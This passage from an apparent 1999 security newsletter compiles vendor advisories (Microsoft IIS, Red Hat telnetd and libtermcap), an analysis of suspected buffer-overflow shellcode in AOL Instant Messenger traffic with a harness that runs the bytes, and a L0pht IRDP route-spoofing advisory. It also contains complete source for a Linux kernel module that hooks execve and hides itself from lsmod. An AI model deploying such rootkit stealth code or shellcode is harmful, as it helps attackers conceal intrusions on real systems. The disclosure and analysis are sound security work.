increase in certificates that are issued to devices such as routers and firewalls to manage secure communications. Using the time stamping feature contained in some PKIs, organizations can protect auditing and logging data and store it encrypted. For high security sites, content could be protected on a page by page basis. And with the ascendence of Directory Services in the enterprise organizations are discovering a central repository with a shared query language (LDAP) that can be used to store and distribute certificates. PKI has an imporant place in the future of e-Business. The trick is for companies to establish the business problem that needs to be solved first and then match the PKI solution appropriately. When companies address a business need with the right technology everybody wins. Diana Kelley (dkelley@hurwitz.com) is a Senior Security Analyst at Hurwitz Group, Inc., (www.hurwitz.com) the leading analyst and advisory firm focused on strategic e-Business applications. Hurwitz Group partners with clients to enable their success in applying electronic business strategies for maximum growth and competitive advantage. Related Links General Sites American Bar Association - Digital Signature Guidelines The Ten Minute CEO Briefing on PKI, Digital Certificates, and Trust in Electronic Transactions - 5 Questions every CEO should be able to answer International Chamber of Commerce: General Usage for International Digitally Ensured Commerce Government Sites NIST PKI Technical Working Group Federal PKI Steering Committee Government of Canada's PKI PKI Vendors & Standards @HWA 65.0 Microsoft Advisory, double byte code page vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Re-release of Patch for "Double Byte Code Page" Vulnerability ------------------------------------------------------------- August 20, 1999 Issue ===== Microsoft has identifed and corrected a regression error in the IIS 4.0 version of the previously-released patch for the "Double Byte Code Page" vulnerability. The corrected patch has been re-released, and an updated security bulletin is available at http://www.microsoft.com/security/bulletins/ms99-022.asp. Details ======= Shortly after releasing the patch for the "Malformed HTTP Request Header" vulnerability (http://www.microsoft.com/Security/Bulletins/ms99-029.asp), Microsoft discovered a regression error in it. We investigated all previously-released patches to determine whether any others were affected by the error, and discovered that one other patch was affected -- the IIS 4.0 version of the patch for the "Double Byte Code Page" vulnerability. On August 16, 1999, we re-released the patch for the "Malformed HTTP Request Header" vulnerability, and today are re-releasing the patch for the "Double Byte Code Page" vulnerability. We have verified that no other security patches are affected by this vulnerability, and have corrected our code base to eliminate the error from all future IIS 4.0 releases. The regression error is completely unrelated to the vulnerabilities, and does not change our diagnosis of either. The error occurs if the IIS log file grows to a size that is an exact multiple of 64KB; if this happens, the server will hang. The problem can be resolved by stopping the IIS service, starting a new log file, and restarting the IIS service. The regression error affected only IIS 4.0, and was introduced after Windows NT 4.0 Service Pack 5. How to Identify the Re-released Patches ======================================= - The re-released patches for the "Double Byte Code Page" are timestamped August 17, 1999. (Please note that the IIS 3.0 patches were unaffected by the regression error, so they are still timestamped June 24, 1999). - The re-released patches for the "Malformed HTTP Request Header" are timestamped August 12, 1999. What Customers Should Do ======================== You do not need to take any action if ANY of the following apply to you: - You are running IIS 3.0. - You have not installed any IIS 4.0 patches released after Windows NT 4.0 Service Pack 5. - You have installed the re-released patch for the "Malformed HTTP Request Header" vulnerability. You need to take action if ALL of the following apply to you: - You applied the original version of either the "Double Byte Code Page" patch or the "Malformed HTTP Request Header" patch. - You have not applied the re-released version of either patch. If you need to take action, you should apply the re-released patches for either the "Maformed HTTP Request Header" or "Double Byte Code Page" vulnerabilities. Applying either of the patches will correct the error. It's not necessary to "back out" either of the original patches; just download the new version of either patch and install it. Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. --------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA 66.0 RHSA:Denial of service attack in in.telnetd ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --------------------------------------------------------------------- Red Hat, Inc. Security Advisory Synopsis: Denial of service attack in in.telnetd Advisory ID: RHSA-1999:029-01 Issue date: 1999-08-19 Updated on: Keywords: telnet telnetd Cross references: --------------------------------------------------------------------- 1. Topic: A denial of service attack has been fixed in in.telnetd. 2. Bug IDs fixed (http://developer.redhat.com/bugzilla/): 4560 3. Relevant releases/architectures: Red Hat Linux 4.2, 5.2, 6.0, all architectures 4. Obsoleted by: 5. Conflicts with: 6. RPMs required: Red Hat Linux 4.2: Intel: ftp://ftp.redhat.com/redhat/updates/4.2/i386/NetKit-B-0.09-11.i386.rpm Alpha: ftp://ftp.redhat.com/redhat/updates/4.2/alpha/NetKit-B-0.09-11.alpha.rpm Sparc: ftp://ftp.redhat.com/redhat/updates/4.2/sparc/NetKit-B-0.09-11.sparc.rpm Source packages: ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/NetKit-B-0.09-11.src.rpm Red Hat Linux 5.2: Intel: ftp://ftp.redhat.com/redhat/updates/5.2/i386/telnet-0.10-28.5.2.i386.rpm Alpha: ftp://ftp.redhat.com/redhat/updates/5.2/alpha/telnet-0.10-28.5.2.alpha.rpm Sparc: ftp://ftp.redhat.com/redhat/updates/5.2/sparc/telnet-0.10-28.5.2.sparc.rpm Source packages: ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/telnet-0.10-28.5.2.src.rpm Red Hat Linux 6.0: Intel: ftp://ftp.redhat.com/redhat/updates/6.0/i386/telnet-0.10-29.i386.rpm Alpha: ftp://ftp.redhat.com/redhat/updates/6.0/alpha/telnet-0.10-29.alpha.rpm Sparc: ftp://ftp.redhat.com/redhat/updates/6.0/sparc/telnet-0.10-29.sparc.rpm Source packages: ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/telnet-0.10-29.src.rpm 7. Problem description: in.telnetd attempts to negotiate a compatible terminal type between the local and remote host. By setting the TERM environment variable before connecting, a remote user could cause the system telnetd to open files it should not. Depending on the TERM setting used, this could lead to denial of service attacks. Thanks go to Michal Zalewski and the Linux Security Audit team for noting this vulnerability. 8. Solution: For each RPM for your particular architecture, run: rpm -Uvh where filename is the name of the RPM. 9. Verification: MD5 sum Package Name -------------------------------------------------------------------------- 0c425c34fb77a8309ff10b4143e9b847 i386/NetKit-B-0.09-11.i386.rpm d791d645adeb5fa0147c1058b21cbbac alpha/NetKit-B-0.09-11.alpha.rpm bfbd440845191bbdcf8be21ee59bf6a8 sparc/NetKit-B-0.09-11.sparc.rpm ccd5ab53c423e468d66ca801c90b5ae4 SRPMS/NetKit-B-0.09-11.src.rpm ef33f3c5ca810d05420e57b5cfcf8928 i386/telnet-0.10-28.5.2.i386.rpm 6dc23437a200193b0bfed23d5f5e6562 alpha/telnet-0.10-28.5.2.alpha.rpm 49c38457cc0a82a680fd9b9634dc8021 sparc/telnet-0.10-28.5.2.sparc.rpm 2f33670a683e3abef0e4914586c71961 SRPMS/telnet-0.10-28.5.2.src.rpm 4360d47490f13d60b8737d28dc88825a i386/telnet-0.10-29.i386.rpm 90213fcdca41a3ed12ab7d92344e7286 alpha/telnet-0.10-29.alpha.rpm 277787dbc39dff8ea84d4b16dcb7a954 sparc/telnet-0.10-29.sparc.rpm 269783a0754d234f7bef0f4717a8dbc2 SRPMS/telnet-0.10-29.src.rpm These packages are PGP signed by Red Hat Inc. for security. Our key is available at: http://www.redhat.com/corp/contact.html You can verify each package with the following command: rpm --checksig If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: rpm --checksig --nopgp 10. References: @HWA 67.0 [EuroHaCk] stealth-code ~~~~~~~~~~~~~~~~~~~~~~~ ---------- Forwarded message ---------- Date: Wed, 18 Aug 1999 18:56:09 +0200 From: Martin Markovitz Reply-To: eurohack@bofh.kyrnet.kg To: coders@dione.ids.pl Subject: [EuroHaCk] stealth-code hi, don't think that hiding modules is an old topic. ;-) since all the other dirty tricks didn't work on 2.2 kernel (as using asm-code etc.) i used new techniqe to hide modules. example-code below. payload is simly print-out-message-at-execution-call thingie. this module even is stealth enuff ;-) for my radar.c module-detector. any other suggestions are welcome. cheers, Stealth : ---- main(){fork();main();} ---- : Hi! I'm a .signature virus! Copy me into your ~/.signature, please! : Stealth <-> http://www.kalug.lug.net/stealth /*** A kernel-module for 2.2 kernels, hiding itself. *** It was easier in 2.0 kernels and i found all the old *** techniqes not to work. So i invented new one. ;-) *** (C) 1999/2000 by Stealth. *** All under the GPL. SO YOU USE IT AT YOUR OWN RISK. *** http://www.kalug.lug.net/stealth *** *** Greets to all my friends, you know who you are. ***/ #define __KERNEL__ #define MODULE #include #include #include #include #include #include #include #include #ifndef NULL #define NULL ((void*)0) #endif extern void *sys_call_table[]; int (*old_exec)(struct pt_regs regs); int new_exec(struct pt_regs regs) { int error = 0; char *filename; lock_kernel(); filename = getname((char*)regs.ebx); error = PTR_ERR(filename); if (IS_ERR(error)) goto out; printk("Hi, the hook is still installed. ;-)\n"); error = do_execve(filename, (char**)regs.ecx, (char**)regs.edx, ®s); putname(filename); out: unlock_kernel(); return error; } int init_module() { int i = 0; struct module *m = &__this_module, *lastm = NULL, *to_delete = NULL; EXPORT_NO_SYMBOLS; /* install hook */ old_exec = sys_call_table[__NR_execve]; sys_call_table[__NR_execve] = new_exec; /* get next module-struct */ to_delete = m->next; if (!to_delete) { printk("No module found for exchange }|-(\n"); return 0; } /* and steal all information about it */ m->name = to_delete->name; m->size = to_delete->size; m->flags = to_delete->flags; /* even set the right USE_COUNT */ for (i = 0; i < GET_USE_COUNT(to_delete); i++) MOD_INC_USE_COUNT; /* and drop the attacked module from the list * this won't delete it but makes it disapear for lsmod */ m->next = to_delete->next; printk("The following modules are visible now:\n"); while (m) { printk("%s\n", m->name); m = m->next; } printk("Tzzz... (sleeping)\n"); return 0; } int cleanup_module() { sys_call_table[__NR_execve] = old_exec; return 0; } @HWA 68.0 RHSA;Buffer overflow in libtermcap tgetent() ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --------------------------------------------------------------------- Red Hat, Inc. Security Advisory Synopsis: Buffer overflow in libtermcap tgetent() Advisory ID: RHSA-1999:028-01 Issue date: 1999-08-17 Updated on: Keywords: termcap xterm Cross references: --------------------------------------------------------------------- 1. Topic: A buffer overflow has been fixed in the tgetent() function of libtermcap. 2. Bug IDs fixed (http://developer.redhat.com/bugzilla/): 4538 3. Relevant releases/architectures: Red Hat Linux 4.2, 5.2, 6.0, all architectures 4. Obsoleted by: 5. Conflicts with: 6. RPMs required: Red Hat Linux 4.2: Intel: ftp://ftp.redhat.com/redhat/updates/4.2/i386/libtermcap-2.0.8-14.4.2.i386.rpm ftp://ftp.redhat.com/redhat/updates/4.2/i386/libtermcap-devel-2.0.8-14.4.2.i386.rpm Alpha: ftp://ftp.redhat.com/redhat/updates/4.2/alpha/libtermcap-2.0.8-14.4.2.alpha.rpm ftp://ftp.redhat.com/redhat/updates/4.2/alpha/libtermcap-devel-2.0.8-14.4.2.alpha.rpm Sparc: ftp://ftp.redhat.com/redhat/updates/4.2/sparc/libtermcap-2.0.8-14.4.2.sparc.rpm ftp://ftp.redhat.com/redhat/updates/4.2/sparc/libtermcap-devel-2.0.8-14.4.2.sparc.rpm Source packages: ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/libtermcap-2.0.8-14.4.2.src.rpm Red Hat Linux 5.2: Intel: ftp://ftp.redhat.com/redhat/updates/5.2/i386/libtermcap-2.0.8-14.5.2.i386.rpm ftp://ftp.redhat.com/redhat/updates/5.2/i386/libtermcap-devel-2.0.8-14.5.2.i386.rpm Alpha: ftp://ftp.redhat.com/redhat/updates/5.2/alpha/libtermcap-2.0.8-14.5.2.alpha.rpm ftp://ftp.redhat.com/redhat/updates/5.2/alpha/libtermcap-devel-2.0.8-14.5.2.alpha.rpm Sparc: ftp://ftp.redhat.com/redhat/updates/5.2/sparc/libtermcap-2.0.8-14.5.2.sparc.rpm ftp://ftp.redhat.com/redhat/updates/5.2/sparc/libtermcap-devel-2.0.8-14.5.2.sparc.rpm Source packages: ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/libtermcap-2.0.8-14.5.2.src.rpm Red Hat Linux 6.0: Intel: ftp://ftp.redhat.com/redhat/updates/6.0/i386/libtermcap-2.0.8-15.i386.rpm ftp://ftp.redhat.com/redhat/updates/6.0/i386/libtermcap-devel-2.0.8-15.i386.rpm Alpha: ftp://ftp.redhat.com/redhat/updates/6.0/alpha/libtermcap-2.0.8-15.alpha.rpm ftp://ftp.redhat.com/redhat/updates/6.0/alpha/libtermcap-devel-2.0.8-15.alpha.rpm Sparc: ftp://ftp.redhat.com/redhat/updates/6.0/sparc/libtermcap-2.0.8-15.sparc.rpm ftp://ftp.redhat.com/redhat/updates/6.0/sparc/libtermcap-devel-2.0.8-15.sparc.rpm Source packages: ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/libtermcap-2.0.8-15.src.rpm 7. Problem description: A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Under Red Hat Linux 5.2 and 4.2, this could lead to local users gaining root privileges, as xterm (as well as other possibly setuid programs) are linked against libtermcap. Under Red Hat Linux 6.0, xterm is not setuid root. Thanks go to Kevin Vajk and the Linux Security Audit team for noting and providing a fix for this vulnerability. 8. Solution: For each RPM for your particular architecture, run: rpm -Uvh where filename is the name of the RPM. 9. Verification: MD5 sum Package Name -------------------------------------------------------------------------- 31b5612edbb97c66600ac65c81c85fc2 i386/libtermcap-2.0.8-14.4.2.i386.rpm 8c26efd7648e92f23e9d2b5e7f48d3a4 i386/libtermcap-devel-2.0.8-14.4.2.i386.rpm e6a3cb5ad06d6b64a40321b01d18931b alpha/libtermcap-2.0.8-14.4.2.alpha.rpm 15c288bd178504542be3b2cee077713a alpha/libtermcap-devel-2.0.8-14.4.2.alpha.rpm 8fb7ce4743c14b4163c4871dada51b63 sparc/libtermcap-2.0.8-14.4.2.sparc.rpm bc7a74a44201b37fa6cf3515bd20a2bd sparc/libtermcap-devel-2.0.8-14.4.2.sparc.rpm eb117c8f9f926b7fe75f6ebbdf3d2a6b SRPMS/libtermcap-2.0.8-14.4.2.src.rpm 9811a7c7665a18a46e9c876163628ba6 i386/libtermcap-2.0.8-14.5.2.i386.rpm 91248a539ee5fb708d194403c61ee14c i386/libtermcap-devel-2.0.8-14.5.2.i386.rpm 50a9dcb2fea451b03b743c46ea478418 alpha/libtermcap-2.0.8-14.5.2.alpha.rpm a98bbcd7a3e8ab0b41983318aea5e919 alpha/libtermcap-devel-2.0.8-14.5.2.alpha.rpm 4c2f8d832512fabbe5dbcb89fc782159 sparc/libtermcap-2.0.8-14.5.2.sparc.rpm b65b6267eed90d8149a9e52462b3cf10 sparc/libtermcap-devel-2.0.8-14.5.2.sparc.rpm 19caa6ab708d3a3f6af8eddafb5f53f2 SRPMS/libtermcap-2.0.8-14.5.2.src.rpm 4995cf0a7c181abe56565d82f12c7819 i386/libtermcap-2.0.8-15.i386.rpm 59d18de3f22abe5674575961b1390177 i386/libtermcap-devel-2.0.8-15.i386.rpm 611cdfb7f167242e7d3b2eaac866705a alpha/libtermcap-2.0.8-15.alpha.rpm 76098235237b5f051ad1266193d7b259 alpha/libtermcap-devel-2.0.8-15.alpha.rpm 846ad7a73b25d3eceab1949322337e14 sparc/libtermcap-2.0.8-15.sparc.rpm 6ddde808ec8b5bc7960851ef3188a6dd sparc/libtermcap-devel-2.0.8-15.sparc.rpm 6a29851494601540d642ff557bd590d6 SRPMS/libtermcap-2.0.8-15.src.rpm These packages are PGP signed by Red Hat Inc. for security. Our key is available at: http://www.redhat.com/corp/contact.html You can verify each package with the following command: rpm --checksig If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: rpm --checksig --nopgp 10. References: @HWA 69.0 Possible AOL IM buffer overflow ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* Possible Buffer Overflow in AOL Instant Messenger ------------------------------------------------------------ Robert Graham http://www.robertgraham.com/pubs/aol-exploit/ It appears to me that AOL might be running a buffer-overflow exploit against their own clients. BEFORE DOING ANYTHING ELSE: log onto AOL Instant Messaging and take a trace of it with NetMon/tcpdump/Sniffer/etc. If this is really happening, then AOL will likely fix it soon. DETAILS ------------------------------------------------------------ Last friday I read the following in the NYTimes: http://www.nytimes.com/library/tech/99/08/biztech/articles/13soft.html This story brings up the implication that America Online might be running a "buffer-overflow exploit" on in its own users. They have already made 13 changes to their server code in the past few weeks in order to stop Microsoft's clones from working, so this may be yet another attempt. According to whay I see, it appears to me that this implication is correct. I see something that looks a lot like a buffer overflow exploit when sniffing the connection between the client and AOL's servers. You can reproduce this yourself: 1. log onto AOL Instant Messenger with the latest client that comes with Communicator version WIN32 2.0.912, aka 2.0N. (Click on [File/Help/Report a bug] to get the real version). 2. take a packet trace of the login procedures (I use NetMon). 3. look for the frame that I describe below. 4. copy/paste the frame data into the C program as I demonstrate below. 5. step through the code in the debugger and disassemble it THE PACKET ------------------------------------------------------------ AOL has removed their documentation from the Internet recently. I had to download the GAIM (AIM client for Linux) source code to figure things out. A TCP connection is used. The format for each request/response in the login process is: byte[0] = 0x2a byte[1] = 0x02 (type = 2 =login) byte[2-3] = sequence number byte[4-5] = length byte[6-7] = type byte[8-9] = subtype However, multiple requests/responses can be queued into a single packet. Following is the entire TCP packet I received from the AOL server to my client: 00000000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E. 00000010 01 90 35 2A 40 00 7F 06 AF 73 0A 00 00 02 0A 00 ..5*@...s...... 00000020 01 C9 04 38 0D 7F 25 F8 E3 A3 0C 19 A5 14 50 18 ...8.%.......P. 00000030 6E B5 4C E2 00 00/2A 02 31 F8 00 0C 00 0B 00 02 n.L...*.1....... 00000040 00 00 80 A2 F1 D5 04 B0/2A 02 31 F9 01 28 00 01 ........*.1..(.. 00000050 00 13 00 00 80 A2 F1 D6 00 FF 00 0B 01 18*83*C4 ................ 00000060 10 4F 8D 94 24 E4 FE FF FF 8B EC 03 AA F8 00 00 .O..$........... 00000070 00 90 90 90 90 8B 82 F0 00 00 00 8B 00 89 82 4E ...............N 00000080 00 00 00 8B 4D 04 03 8A F4 00 00 00 8D 82 42 00 ....M.........B. 00000090 00 00 89 45 10 B8 10 00 00 00 89 45 0C C9 FF E1 ...E.......E.... 000000A0 00 01 00 20 00 00 00 00 00 00 00 04 00 00 00 00 ................ 000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 10 ................ 00000150 08 11 29 EC FF FF 44 00 00 00 00 00 00 00 FF 00 ..)...D......... 00000160 00 00 08 01 00 00 00 00 00 00 90 47 40 00 F8*E9*...........G@... 00000170 EA FE FF FF 00 00/2A 02 31 FA 00 22 00 01 00 13 ......*.1..".... 00000180 00 00 80 A2 F1 D7 00 04 00 0B 00 12 68 74 74 70 ............http 00000190 3A 2F 2F 77 77 77 2E 61 6F 6C 2E 63 6F 6D ://www.aol.com There are three AIM segments in this packet, which I've marked with slashes in the above decode. (Remember that TCP is a stream based protocol, so application protocols have to figure out their own boundaries, and you often see multiple segments in a single TCP packet). The second segment is of interest here, as marked by the slashes. It seems like the first byte of the embedded code starts at the byte with the value 0x83 at offset 0x53 However, this isn't the buffer overflow, but the start of the buffer itself. Immediately proceeding this is what appears to be a length field. I'm thinking they only allow for a max length of 256 (0x100), but the length field has an extra 0x18 bytes. So if we go 256 bytes into the buffer, we get some more stuff that looks like code. I haven't analyzed all this stuff, but it appears that at the end of the overflow section, it jumps back to the start of the buffer that contains the code of the exploit. [You only get so much wriggle room where you overflow, because the more you overflow, the more of the stack you overwrite; so the overflowed section has to be as small as possible, and jump backwards to actually run something]. THE DECODE ------------------------------------------------------------ In this section, I have done a decode of all the bytes in the segment. To the left are the original bytes, to the right is either the protocol interpretation or the disassembled output. These bytes are in the same order as in the original packet. 2A 02 parse of logon sequence 31 F9 sequence number 01 28 length of this segment 00 01 00 13 type/subtype field of this packet 00 00 80 A2 F1 D6 00 FF 00 0B unknown data 01 18 length of data field 83 C4 10 add esp,10h 4F dec edi 8D 94 24 E4 FE FF FF lea edx,dword ptr [esp-11Ch] 8B EC mov ebp,esp 03 AA F8 00 00 00 add ebp,dword ptr [edx+0F8h] 90 nop 90 nop 90 nop 90 nop 8B 82 F0 00 00 00 mov eax,dword ptr [edx+0F0h] 8B 00 mov eax,dword ptr [eax] 89 82 4E 00 00 00 mov dword ptr [edx+4Eh],eax 8B 4D 04 mov ecx,dword ptr [ebp+4] 03 8A F4 00 00 00 add ecx,dword ptr [edx+0F4h] 8D 82 42 00 00 00 lea eax,dword ptr [edx+42h] 89 45 10 mov dword ptr [ebp+10h],eax B8 10 00 00 00 mov eax,10h 89 45 0C mov dword ptr [ebp+0Ch],eax C9 leave FF E1 jmp ecx 00 01 00 20 00 00 00 00 00 00 00 04 00 00 00 00 filler 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 block 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 that 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 doesn't 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 mean 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 much 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 10 start of 08 11 29 EC FF FF 44 00 00 00 00 00 00 00 FF 00 overflow 00 00 08 01 00 00 00 00 00 00 90 47 40 00 jump address? F8 unknown E9 EA FE FF FF jmp back_to_start_of_buffer 00 00 You'll notice that there appears to be other code that I haven't disassembled. I would have to second-guess the original source, and I don't quite feel like it. How to disassemble this? The easiest way is simply to paste the data bytes into a program and RUN the code. In theory, you could create a sample program that would actually run this code completely without crashing but that would take A LOT of effort. THE CODE TO TEST IT ------------------------------------------------------------ */ /* The data from the packet, starting at where I believe the data field * begins.*/ unsigned char packet[] = {0x83, 0xC4, 0x10, 0x4F, 0x8D, 0x94, 0x24, 0xE4, 0xFE, 0xFF, 0xFF, 0x8B, 0xEC, 0x03, 0xAA, 0xF8, 0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x8B, 0x82, 0xF0, 0x00, 0x00, 0x00, 0x8B, 0x00, 0x89, 0x82, 0x4E, 0x00, 0x00, 0x00, 0x8B, 0x4D, 0x04, 0x03, 0x8A, 0xF4, 0x00, 0x00, 0x00, 0x8D, 0x82, 0x42, 0x00, 0x00, 0x00, 0x89, 0x45, 0x10, 0xB8, 0x10, 0x00, 0x00, 0x00, 0x89, 0x45, 0x0C, 0xC9, 0xFF, 0xE1, 0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x19, 0x10, 0x08, 0x11, 0x29, 0xEC, 0xFF, 0xFF, 0x44, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x47, 0x40, 0x00, 0xF8, 0xE9, 0xEA, 0xFE, 0xFF, 0xFF, 0x00, 0x00, 0x2A, 0x02, 0x31, 0xFA, 0x00, 0x22, 0x00, 0x01, 0x00, 0x13, 0x00, 0x00, 0x80, 0xA2, 0xF1, 0xD7, 0x00, 0x04, 0x00, 0x0B, 0x00, 0x12, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x61, 0x6F, 0x6C, 0x2E, 0x63, 0x6F, 0x6D}; /* Function point that will point to the buffer above */ void (*foo)(); int main() { /* Set to the point where it overflows (256-characters in), * then add an offset to the jmp instruction that jumps back * to the begining */ foo = packet+256+0x11; /* In MS DevStudio, put a break point here, and then turn on * disassembly mode [View/Debug Windows/Disassembly]. This will * allow you to single step each assembly intruction, and will * disassemble them for you. Also, turn on view of the original * bytes by righ-hand-mouse-clicking on the disassembly and * selecting [Code Bytes]. */ foo(); return 0; } @HWA 70.0 L0pht security advisory:Attackers can remotely add default route entries ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[begin]-- L0pht Security Advisory Release date: August 11, 1999 Vulnerable: Microsoft Windows95a (w/winsock2), Windows95b Windows98, Windows98se and Sun Microsystems SunOS & Solaris operating systems. Severity: Attackers can remotely add default route entries on the victims host. Status: Microsoft contacted, fix provided. Author: sili@l0pht.com URL: http://www.L0pht.com/advisories.html Source code: http://www.l0pht.com/advisories/rdp.tar.gz code written by Silicosis & Mudge I. Problem ---------- The ICMP Router Discovery Protocol (IRDP) comes enabled by default on DHCP clients that are running Microsoft Windows95 (w/winsock2), Windows95b, Windows98, Windows98se, and Windows2000 machines. By spoofing IRDP Router Advertisements, an attacker can remotely add default route entries on a remote system. The default route entry added by the attacker will be preferred over the default route obtained from the DHCP server. While Windows2000 does indeed have IRDP enabled by default, it less vulnerable as it is impossible to give it a route that is preferred over the default route obtained via DHCP. SunOS systems will also intentionally use IRDP under specific conditions. For Solaris2.6, the IRDP daemon, in.rdisc, will be started if the following conditions are met: . The system is a host, not a router. . The system did not learn a default gateway from a DHCP server. . The system does not have any static routes. . The system does not have a valid /etc/defaultrouter file. It should be noted that the important point of this advisory is not that ICMP Router Solicitation and Advertisement packets have no authentication properties. Yes, this is a problem but it has long been known. The dangerous aspect comes in various MS platforms enabling this protocol and believing it _even when the DHCP setup specifies not to use IRDP (dhcp option #31) (ie the operating system does this even though you believe you are telling it NOT TO). The tool provided with this advisory is the basis of what would be used for everything from web page hacks, stealing credentials, modifying or altering data, etc. involving vulnerable systems. We believe most cable modem DHCP clients and large internal organizations are at risk. II. Risks --------- The ICMP Router Discovery Protocol does not have any form of authentication, making it impossible for end hosts to tell whether or not the information they receive is valid. Because of this, attackers can perform a number of attacks: Passive monitoring: In a switched environment, an attacker can use this to re-route the outbound traffic of vulnerable systems through them. This will allow them to monitor or record one side of the conversation. * For this to work, and attacker must be on the * same network as the victim. Man in the Middle: Taking the above attack to the next level, the attacker would also be able to modify any of the outgoing traffic or play man 